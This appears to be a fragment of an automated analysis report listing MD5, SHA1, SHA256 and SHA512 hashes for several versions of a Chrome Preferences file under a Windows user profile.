| SHA256 | 09263549d89d3b0c7048c8c289781df04582d680938fae4f2045bf0804308d2b |
| SHA512 | a0b8f4907b77c66ce3d79d11bcd9921baca18b3f6e8d4b5f39db1639a4390df98d6442ac1a8df3bf777960a3fdfff85ac0353d019c37d4f5880126247fe164be |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 92f2c33e84762aa54ad55d115e09ce2e |
| SHA1 | bb3b70113373b1456f1db5b50534f901334ac30d |
| SHA256 | 563238c498d48db7b4ba6a2fa68301e3bbae9df3396438d98f7572fdd9ed5408 |
| SHA512 | 4272578139697f71e6d9dcdab0b331ed246043c1f5008bd3bb8735b57ff276a65e54c5e091ecb9904c27b53e6ce34303473320529c5698ac3366afead12e5a0b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 53a765cd81896fdd8af47d830303cd46 |
| SHA1 | 78e67435b2b0a1d1bb8b7751d8ace5578f908a3b |
| SHA256 | f8fdf26022913c0fa8c77e79ab6a2bfab2c67b5c7c5a208a60db1f249b87fa42 |
| SHA512 | 6b4dfade5ea33ca0b367858179d5fe5922accf9a652a559eaf383143c62fc9d3536a889fd3ad5be69d2a8e891f32b8df67b344c36234d0d47e7af1df15cc6626 |